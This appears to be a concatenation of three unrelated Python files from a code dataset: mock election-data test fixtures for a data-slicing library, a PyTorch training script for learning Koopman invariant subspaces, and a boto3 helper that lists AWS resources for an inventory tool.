        Join(table=deep_join_table,
             criterion=deep_join_table.id == state_table.ref_id),
    ),
    dimensions=(
        DatetimeDimension('timestamp',
                          label='Timestamp',
                          definition=politicians_table.timestamp),
        DatetimeDimension('timestamp2',
                          label='Timestamp 2',
                          definition=politicians_table.timestamp2),
        DatetimeDimension('join_timestamp',
                          label='Join Timestamp',
                          definition=voters_table.timestamp),
        CategoricalDimension('political_party',
                             label='Party',
                             definition=politicians_table.political_party,
                             display_values=(
                                 ('d', 'Democrat'),
                                 ('r', 'Republican'),
                                 ('i', 'Independent'),
                                 ('l', 'Libertarian'),
                                 ('g', 'Green'),
                                 ('c', 'Constitution'))),
        UniqueDimension('candidate',
                        label='Candidate',
                        definition=politicians_table.candidate_id,
                        display_definition=politicians_table.candidate_name),
        UniqueDimension('election',
                        label='Election',
                        definition=politicians_table.election_id,
                        display_definition=politicians_table.election_year),
        UniqueDimension('district',
                        label='District',
                        definition=politicians_table.district_id,
                        display_definition=district_table.district_name),
        UniqueDimension('state',
                        label='State',
                        definition=district_table.state_id,
                        display_definition=state_table.state_name),
        BooleanDimension('winner',
                         label='Winner',
                         definition=politicians_table.is_winner),
        UniqueDimension('deepjoin',
                        definition=deep_join_table.id),
    ),
    metrics=(
        Metric('votes',
               label='Votes',
               definition=fn.Sum(politicians_table.votes)),
        Metric('wins',
               label='Wins',
               definition=fn.Sum(politicians_table.is_winner)),
        Metric('voters',
               label='Voters',
               definition=fn.Count(voters_table.id)),
        Metric('turnout',
               label='Turnout',
               definition=fn.Sum(politicians_table.votes) / fn.Count(voters_table.id),
               suffix='%',
               precision=2),
        Metric('wins_with_suffix_and_prefix',
               label='Wins',
               definition=fn.Sum(politicians_table.is_winner),
               prefix='$',
               suffix='€'),
    ),
)
# Display-value lookup tables for the mock election dataset.
political_parties = OrderedDict((('d', 'Democrat'),
                                 ('r', 'Republican'),
                                 ('i', 'Independent'),
                                 ('l', 'Libertarian'),
                                 ('g', 'Green'),
                                 ('c', 'Constitution')))

# candidate id -> display name (names anonymised in this dump).
candidates = OrderedDict(((1, '<NAME>'),
                          (2, '<NAME>'),
                          (3, '<NAME>'),
                          (4, '<NAME>'),
                          (5, '<NAME>'),
                          (6, '<NAME>'),
                          (7, '<NAME>'),
                          (8, '<NAME>'),
                          (9, '<NAME>'),
                          (10, '<NAME>'),
                          (11, '<NAME>')))

states = OrderedDict(((1, 'Texas'),
                      (2, 'California')))

# election id -> election year (as display string).
elections = OrderedDict(((1, '1996'),
                         (2, '2000'),
                         (3, '2004'),
                         (4, '2008'),
                         (5, '2012'),
                         (6, '2016')))

# Which candidates ran per election and who won.
election_candidates = {
    1: {'candidates': [1, 2, 3], 'winner': 1},
    2: {'candidates': [4, 5], 'winner': 4},
    3: {'candidates': [4, 6], 'winner': 4},
    4: {'candidates': [7, 8], 'winner': 7},
    5: {'candidates': [7, 9], 'winner': 7},
    6: {'candidates': [10, 11], 'winner': 10},
}

candidate_parties = {
    1: 'd',
    2: 'r',
    3: 'i',
    4: 'r',
    5: 'd',
    6: 'd',
    7: 'd',
    8: 'r',
    9: 'r',
    10: 'r',
    11: 'd',
}

# (election id, candidate id, state id) -> vote count.
election_candidate_state_votes = {
    # Texas
    (1, 1, 1): 2459683,
    (1, 2, 1): 2736167,
    (1, 3, 1): 378537,
    (2, 4, 1): 3799639,
    (2, 5, 1): 2433746,
    (3, 4, 1): 4526917,
    (3, 6, 1): 2832704,
    (4, 7, 1): 3528633,
    (4, 8, 1): 4479328,
    (5, 7, 1): 4569843,
    (5, 9, 1): 3308124,
    (6, 10, 1): 4685047,
    (6, 11, 1): 387868,

    # California
    (1, 1, 2): 5119835,
    (1, 2, 2): 3828380,
    (1, 3, 2): 697847,
    (2, 4, 2): 4567429,
    (2, 5, 2): 5861203,
    (3, 4, 2): 5509826,
    (3, 6, 2): 6745485,
    (4, 7, 2): 8274473,
    (4, 8, 2): 5011781,
    (5, 7, 2): 7854285,
    (5, 9, 2): 4839958,
    (6, 10, 2): 8753788,
    (6, 11, 2): 4483810,
}

# (election id, candidate id) -> whether that candidate won the election.
election_candidate_wins = {
    (1, 1): True,
    (1, 2): False,
    (1, 3): False,
    (2, 4): True,
    (2, 5): False,
    (3, 4): True,
    (3, 6): False,
    (4, 7): True,
    (4, 8): False,
    (5, 7): True,
    (5, 9): False,
    (6, 10): True,
    (6, 11): False,
}

# Column order of the mock dataframe (dimension keys then metric keys).
df_columns = [fd('timestamp'),
              fd('candidate'), fd('candidate_display'),
              fd('political_party'),
              fd('election'), fd('election_display'),
              fd('state'), fd('state_display'),
              fd('winner'),
              fm('votes'),
              fm('wins')]
def PoliticsRow(timestamp, candidate, candidate_display, political_party,
                election, election_display, state, state_display, winner,
                votes, wins):
    """Pack one mock politics record into a tuple matching df_columns order."""
    return (timestamp,
            candidate,
            candidate_display,
            political_party,
            election,
            election_display,
            state,
            state_display,
            winner,
            votes,
            wins)
# Materialise one row per (election, candidate, state) vote entry.
records = []
for (election_id, candidate_id, state_id), votes in election_candidate_state_votes.items():
    election_year = elections[election_id]
    winner = election_candidate_wins[(election_id, candidate_id)]
    records.append(PoliticsRow(
        timestamp=datetime(int(election_year), 1, 1),
        candidate=candidate_id, candidate_display=candidates[candidate_id],
        political_party=candidate_parties[candidate_id],
        election=election_id, election_display=elections[election_id],
        state=state_id, state_display=states[state_id],
        winner=winner,
        votes=votes,
        wins=(1 if winner else 0),
    ))
mock_politics_database = pd.DataFrame.from_records(records, columns=df_columns)
# Pre-aggregated dataframe fixtures: naming pattern is
# cont (datetime), cat (categorical) and uni (unique) dimension groupings.
single_metric_df = pd.DataFrame(mock_politics_database[[fm('votes')]]
                                .sum()).T
multi_metric_df = pd.DataFrame(mock_politics_database[[fm('votes'), fm('wins')]]
                               .sum()).T
cont_dim_df = mock_politics_database[[fd('timestamp'), fm('votes'), fm('wins')]] \
    .groupby(fd('timestamp')) \
    .sum()
no_index_df = pd.DataFrame(cont_dim_df.sum()).T
cat_dim_df = mock_politics_database[[fd('political_party'), fm('votes'), fm('wins')]] \
    .groupby(fd('political_party')) \
    .sum()
cat_uni_dim_df = mock_politics_database[[fd('political_party'), fd('candidate'), fd('candidate_display'),
                                         fm('votes'), fm('wins')]] \
    .groupby([fd('political_party'), fd('candidate'), fd('candidate_display')]) \
    .sum() \
    .reset_index(fd('candidate_display'))
uni_dim_df = mock_politics_database[[fd('candidate'), fd('candidate_display'), fm('votes'), fm('wins')]] \
    .groupby([fd('candidate'), fd('candidate_display')]) \
    .sum() \
    .reset_index(fd('candidate_display'))
cont_cat_dim_df = mock_politics_database[[fd('timestamp'), fd('political_party'), fm('votes'), fm('wins')]] \
    .groupby([fd('timestamp'), fd('political_party')]) \
    .sum()
cont_uni_dim_df = mock_politics_database[[fd('timestamp'), fd('state'), fd('state_display'), fm('votes'), fm('wins')]] \
    .groupby([fd('timestamp'), fd('state'), fd('state_display')]) \
    .sum() \
    .reset_index(fd('state_display'))
cont_cat_uni_dim_df = mock_politics_database[[fd('timestamp'), fd('political_party'),
                                              fd('state'), fd('state_display'),
                                              fm('votes'), fm('wins')]] \
    .groupby([fd('timestamp'), fd('political_party'), fd('state'), fd('state_display')]) \
    .sum() \
    .reset_index(fd('state_display'))
# Fixture carrying an operation (cumulative sum) column.
cont_dim_operation_df = cont_dim_df.copy()
operation_key = fm('cumsum(votes)')
cont_dim_operation_df[operation_key] = cont_dim_df[fm('votes')].cumsum()
def split(items, i):
    """Split a sequence in two at index *i*: ``(items[:i], items[i:])``.

    The parameter was renamed from ``list``, which shadowed the builtin.
    """
    return items[:i], items[i:]
def ref(data_frame, columns):
    """Build an 'EoE' (election-over-election) reference frame.

    Shifts *data_frame* two rows, renames *columns* to '<col>_eoe' and joins
    them back, dropping the first two rows which lack reference values.
    NOTE(review): the join target is the module-level ``cont_uni_dim_df``,
    not *data_frame* itself -- confirm this is intentional.
    """
    ref_cols = {column: '%s_eoe' % column
                for column in columns}
    ref_df = data_frame \
        .shift(2) \
        .rename(columns=ref_cols)[list(ref_cols.values())]
    return (cont_uni_dim_df
            .copy()
            .join(ref_df)
            .iloc[2:])
def ref_delta(ref_data_frame, columns):
    """Append '<col>_eoe_delta' columns: reference value minus actual value."""
    eoe_cols = ['%s_eoe' % col for col in columns]
    delta_cols = ['%s_eoe_delta' % col for col in columns]
    deltas = ref_data_frame[eoe_cols].values - ref_data_frame[columns].values
    delta_frame = pd.DataFrame(data=deltas,
                               columns=delta_cols,
                               index=ref_data_frame.index)
    return ref_data_frame.join(delta_frame)
# Metric columns the reference fixtures operate on.
_columns = [fm('votes'), fm('wins')]
cont_uni_dim_ref_df = ref(cont_uni_dim_df, _columns)
cont_uni_dim_ref_delta_df = ref_delta(cont_uni_dim_ref_df, _columns)
def totals(data_frame, dimensions, columns):
    """
    Computes the totals across a dimension and adds the total as an extra row.

    For a plain index a single totals row is appended.  For a MultiIndex,
    one totals level is computed per entry in *dimensions*, marking the
    rolled-up level with the dtype-specific totals marker.
    """
    if not isinstance(data_frame.index, pd.MultiIndex):
        totals_marker = get_totals_marker_for_dtype(data_frame.index.dtype)
        totals_df = pd.DataFrame([data_frame.sum()],
                                 index=pd.Index([totals_marker],
                                                name=data_frame.index.name))
        return data_frame.append(totals_df)

    def _totals(df):
        # Sum a grouped slice; scalar groups come through as Series.
        if isinstance(df, pd.Series):
            return df.sum()
        totals_index_value = get_totals_marker_for_dtype(df.index.levels[-1].dtype)
        return pd.DataFrame(
              [df.sum()],
              columns=columns,
              index=pd.Index([totals_index_value],
                             name=df.index.names[-1]))

    totals_df = None
    # Roll up one trailing index level at a time, innermost first.
    for i in range(-1, -1 - len(dimensions), -1):
        groupby_levels = data_frame.index.names[:i]
        if groupby_levels:
            level_totals_df = data_frame[columns].groupby(level=groupby_levels).apply(_totals)
            # Re-attach any index levels the groupby/apply dropped, filled
            # with the totals marker for that level's dtype.
            missing_dims = set(data_frame.index.names) - set(level_totals_df.index.names)
            if missing_dims:
                for dim in missing_dims:
                    dtype = data_frame.index.levels[data_frame.index.names.index(dim)].dtype
                    level_totals_df[dim] = get_totals_marker_for_dtype(dtype)
                    level_totals_df.set_index(dim, append=True, inplace=True)
                level_totals_df = level_totals_df.reorder_levels(data_frame.index.names)
        else:
            # Grand total: every index level is the totals marker.
            totals_index_values = [get_totals_marker_for_dtype(level.dtype)
                                   for level in data_frame.index.levels]
            level_totals_df = pd.DataFrame([data_frame[columns].apply(_totals)],
                                           columns=columns,
                                           index=pd.MultiIndex.from_tuples([totals_index_values],
                                                                           names=data_frame.index.names))
        totals_df = totals_df.append(level_totals_df) \
            if totals_df is not None \
            else level_totals_df
    return data_frame.append(totals_df).sort_index()
# Convert all index values to string (datetime and range indexes excepted),
# iterating every DataFrame bound at module level so far.
# NOTE(review): the MultiIndex(labels=...) keyword was removed in pandas 1.0
# (renamed to codes=) -- this module targets an older pandas.
for l in list(locals().values()):
    if not isinstance(l, pd.DataFrame):
        continue
    if hasattr(l.index, 'levels'):
        l.index = pd.MultiIndex(levels=[level.astype('str')
                                        if not isinstance(level, (pd.DatetimeIndex, pd.RangeIndex))
                                        else level
                                        for level in l.index.levels],
                                labels=l.index.labels)
    elif not isinstance(l.index, (pd.DatetimeIndex, pd.RangeIndex)):
        l.index = l.index.astype('str')
# Totals-row variants of the grouped fixtures above.
cat_dim_totals_df = totals(cat_dim_df, [fd('political_party')], _columns)
cont_cat_dim_totals_df = totals(cont_cat_dim_df, [fd('political_party')], _columns)
cont_cat_dim_all_totals_df = totals(cont_cat_dim_df, [fd('timestamp'), fd('political_party')], _columns)
cont_uni_dim_totals_df = totals(cont_uni_dim_df, [fd('state')], _columns)
cont_uni_dim_all_totals_df = totals(cont_uni_dim_df, [fd('timestamp'), fd('state')], _columns)
cont_cat_uni_dim_all_totals_df = totals(cont_cat_uni_dim_df, [fd('timestamp'), fd('political_party'), fd('state')],
                                        _columns)
# Election-over-election reference (4-year interval) used by reference tests.
ElectionOverElection = ReferenceType('eoe', 'EoE', 'year', 4)
| StarcoderdataPython |
9288 | #!/usr/bin/env python
# coding: utf-8
""" Learning Koopman Invariant Subspace
(c) <NAME>, 2017.
<EMAIL>
"""
import numpy as np
np.random.seed(1234567890)  # fix the global NumPy RNG so runs are reproducible
from argparse import ArgumentParser
from os import path
import time
from lkis import TimeSeriesBatchMaker, KoopmanInvariantSubspaceLearner
from losses import combined_loss
from torch import device, save, manual_seed
from torch.optim import SGD
import matplotlib.pyplot as plt
import seaborn as sns
# -- Parse arguments
# Command-line interface for the LKIS training script. Defaults give a CPU
# run named "lkis-<timestamp>" training for 1000 epochs on one batch.
# NOTE(review): `t` is never read anywhere in this script — dead assignment.
t = time.time()
parser = ArgumentParser(description='Learning Koopman Invariant Subspace (Now with PyTorch!)')
parser.add_argument("--name", "-n", type=str, default=f"lkis-{int(time.time())}", help="name of experiment")
parser.add_argument("--data-path", type=str, default="./train.npy", help="time-series data to model")
parser.add_argument("--epochs", "-e", type=int, default=1000, help="number of epochs to train for")
parser.add_argument("--num-batches", "-b", type=int, default=1, help="how many batchs for break the data up into")
parser.add_argument("--gpu", action="store_true", default=False, help="use a GPU or no")
parser.add_argument("--intermediate-observable", "-i", type=int, default=-1, help="intermediate dimensional observation space")
parser.add_argument("--save-model", "-m", action="store_true", default=False, help="whether or not you want the model saved to $name$.torch.mdl")
parser.add_argument("--save-training-plot", "-p", action="store_true", default=False, help="where to save plotting")
# -1 means "derive the lag from the data" (one tenth of the series length).
parser.add_argument("--max-lag", "-l", type=int, default=-1, help="maximum_lag")
parser.add_argument("--state-space", "-s", type=int, default=1, help="dimensionality of the underlying state space")
# NOTE(review): alpha is parsed but never used in the training loop below.
parser.add_argument("--alpha", "-a", type=float, default=1.0, help="value to score the reconstruction loss by")
parser.add_argument("--learning-rate", "-r", type=float, default=0.001, help="Optimizer learning rate")
# Empty string disables validation.
parser.add_argument("--validation-data-path", "-v", type=str, default="")
#ToDo: Implement --dmd (currently parsed but unused)
parser.add_argument("--dmd", action="store_true", default=False, help="Execute and save the DMD on the training set")
if __name__ == "__main__":
    # Parse CLI arguments and fix the RNG seed for reproducible runs.
    cli_args = parser.parse_args()
    manual_seed(216)

    # -- Load training data; reshape a 1-D series into a single-feature column.
    data_path = cli_args.data_path
    print(f"Loading training data from {data_path}")
    data_train = np.load(data_path)
    if len(data_train.shape) == 1:
        data_train = data_train.reshape(-1, 1)
    print(f"Loaded a dataset with dimension: {data_train.shape}")

    # -- Optionally load a validation series (empty path disables validation).
    validate = cli_args.validation_data_path != ""
    data_val = None
    if validate:
        data_path = cli_args.validation_data_path
        print(f"Loading validation data from {data_path}")
        data_val = np.load(data_path)

    # Delay (max lag) set by the user, or defaults to a tenth of the data.
    delay = cli_args.max_lag if cli_args.max_lag > 0 else (data_train.shape[0] // 10)
    # Samples per batch follows from series length, delay and batch count.
    samples_per_batch = (data_train.shape[0] - delay) // cli_args.num_batches

    # Batch generators yield (time-delayed observations, targets) pairs.
    batch_iterator = TimeSeriesBatchMaker(
        y=data_train,
        batch_size=samples_per_batch,
        max_lag=delay
    )
    if validate:
        val_batch_iterator = TimeSeriesBatchMaker(
            y=data_val,
            max_lag=delay
        )

    # End-to-end LKIS model: delay embedding -> latent g -> reconstruction.
    lkis = KoopmanInvariantSubspaceLearner(
        observable_dim=data_train.shape[1],
        latent_dim=cli_args.state_space,
        intermediate_observable=cli_args.intermediate_observable,
        delay=delay
    )

    # BUG FIX: the original rebound the imported torch.device function
    # (`device = device("cuda")`) and never moved the model to the GPU.
    run_device = device("cuda") if cli_args.gpu else device("cpu")
    lkis.to(run_device)  # nn.Module.to() moves parameters in place

    # Initialize the optimizer over the (already device-placed) parameters.
    optimizer = SGD(lkis.parameters(), lr=cli_args.learning_rate)

    losses = []
    val_losses = []
    for epoch in range(cli_args.epochs):
        loss = 0
        for b in range(cli_args.num_batches):
            optimizer.zero_grad()

            time_delayed_ys, y_true = next(batch_iterator)
            # BUG FIX: Tensor.to() returns a copy (it is NOT in place); the
            # original discarded its result, so data never reached the GPU.
            time_delayed_ys = time_delayed_ys.to(run_device)
            y_true = y_true.to(run_device)

            g_pred, y_pred = lkis(time_delayed_ys)
            # Consecutive latent states feed the linearity (DMD) loss term.
            g_0 = g_pred[:-1]
            g_1 = g_pred[1:]

            batch_loss = combined_loss(y_pred=y_pred, y_true=y_true, g_0=g_0, g_1=g_1)
            batch_loss.backward()
            optimizer.step()
            loss += batch_loss.item()

        # display the epoch training loss
        print(f"epoch : {epoch + 1}/{cli_args.epochs}, loss = {loss:.6f}")
        losses.append(loss)

        if validate:
            y_time_delayed_val, y_true = next(val_batch_iterator)
            # BUG FIX: same reassignment fix as above for validation tensors.
            y_time_delayed_val = y_time_delayed_val.to(run_device)
            y_true = y_true.to(run_device)

            g_pred, y_pred = lkis(y_time_delayed_val)
            g_0 = g_pred[:-1]
            g_1 = g_pred[1:]
            batch_loss = combined_loss(y_pred=y_pred, y_true=y_true, g_0=g_0, g_1=g_1)
            val_loss = batch_loss.item()
            print(f"\tval-loss = {val_loss:.6f}")
            val_losses.append(val_loss)

    if cli_args.save_model:
        save(lkis, f"{cli_args.name}.torch.mdl")

    if cli_args.save_training_plot:
        sns.lineplot(x=list(range(cli_args.epochs)), y=losses, label="training loss")
        if validate:
            sns.lineplot(x=list(range(cli_args.epochs)), y=val_losses, label="validation loss")
        plt.xlabel("Epochs")
        plt.ylabel("Combined Reconstruction and DMD Loss")
        plt.title(f"Training Loss for {cli_args.name}")
        plt.savefig(f"{cli_args.name}-training-loss.png")
| StarcoderdataPython |
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import boto3
import logging
from aai import config as _config
# import utils.aws as aws
log = logging.getLogger('aws-auto-inventory.aws')
def fetch(profile_name, region_name, service, function, result_key, parameters):
    """Call one boto3 client method and return its (possibly keyed) response.

    :param profile_name: AWS CLI profile used to build the boto3 session.
    :param region_name: AWS region the client is bound to.
    :param service: boto3 service name (e.g. ``'ec2'``).
    :param function: client method name, resolved dynamically via getattr.
    :param result_key: optional key extracted from the raw response
        (boto3 list/describe calls typically return a list under it).
    :param parameters: optional kwargs dict forwarded to the method.
    :return: the API response; an empty string when the call raised
        (errors are logged, not propagated — original best-effort behavior).
    """
    log.info('Started: {}:{}:{}:{}:{}'.format(region_name, service, function, result_key, parameters))
    response = ""
    try:
        session = boto3.Session(profile_name=profile_name)
        client = session.client(service, region_name=region_name)
        # getattr is the idiomatic form of client.__getattribute__(function).
        method = getattr(client, function)
        if parameters is not None:
            if result_key:
                response = method(**parameters).get(result_key)
            else:
                response = method(**parameters)
        elif result_key:
            response = method().get(result_key)
        else:
            response = method()
        # BUG FIX: when result_key is set the response is usually a list, and
        # list.pop('ResponseMetadata', None) raised TypeError, which the broad
        # except below swallowed as a spurious error log. Only dicts carry the
        # (not useful) ResponseMetadata entry, so strip it from dicts only.
        if isinstance(response, dict):
            response.pop('ResponseMetadata', None)
    except Exception as e:
        log.error("Error while processing {}, {}.\n{}".format(service, region_name, e))
    log.info('Finished:{}:{}:{}:{}'.format(service, region_name, function, result_key))
    return response
def get_methods(client):
    """Return every attribute name exposed by *client*, as dir() reports it."""
    return dir(client)
def get_read_methods(client):
    """Return the attribute names of *client* that look read-only.

    Keeps every name containing ``'describe'`` or ``'list'``, which covers
    the boto3 read APIs (``describe_*`` / ``list_*``), in dir() order.
    """
    # Comprehension over dir() replaces the original manual append loop.
    return [method for method in dir(client)
            if 'describe' in method or 'list' in method]
def get(profile_name, region_name, sheet):
    """Fetch the inventory data described by one *sheet* configuration entry.

    :param profile_name: AWS CLI profile forwarded to fetch().
    :param region_name: AWS region forwarded to fetch().
    :param sheet: dict with mandatory 'service' and 'function' keys, plus
        optional 'result_key' and 'parameters'.
    :return: whatever fetch() returned for that service call.
    """
    service = sheet['service']
    function = sheet['function']
    # optional entries default to None
    result_key = sheet.get('result_key', None)
    parameters = sheet.get('parameters', None)
    log.info('Started:{}:{}:{}:{}:{}'.format(profile_name, region_name, service, function, result_key))
    result = fetch(profile_name=profile_name, region_name=region_name, service=service, function=function, result_key=result_key, parameters=parameters)
    log.info('Result:{{{}}}'.format(result))
    log.info('Finished:{}:{}:{}:{}'.format(region_name, service, function, result_key))
    return result
def get_session(profile_name):
    """Build a boto3 Session bound to the given AWS CLI profile."""
    return boto3.Session(profile_name=profile_name)
def get_account_id():
    """Return the AWS account id of the caller via STS get_caller_identity.

    Uses the default boto3 session credentials; also logs the caller's
    account, user id and ARN.
    """
    log.info('Started: get_caller_identity')
    # BUG FIX: the original called aws.get_session(), but the `utils.aws`
    # import is commented out at module top, so this always raised NameError.
    # get_session() in this module requires a profile name this function does
    # not receive, so fall back to the default boto3 session.
    client = boto3.Session().client('sts')
    response = client.get_caller_identity()
    account = response['Account']
    user_id = response['UserId']
    arn = response['Arn']
    log.info('Account: {}'.format(account))
    log.info('UserId: {}'.format(user_id))
    log.info('Arn: {}'.format(arn))
    log.info('Finished: get_caller_identity')
    return account
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.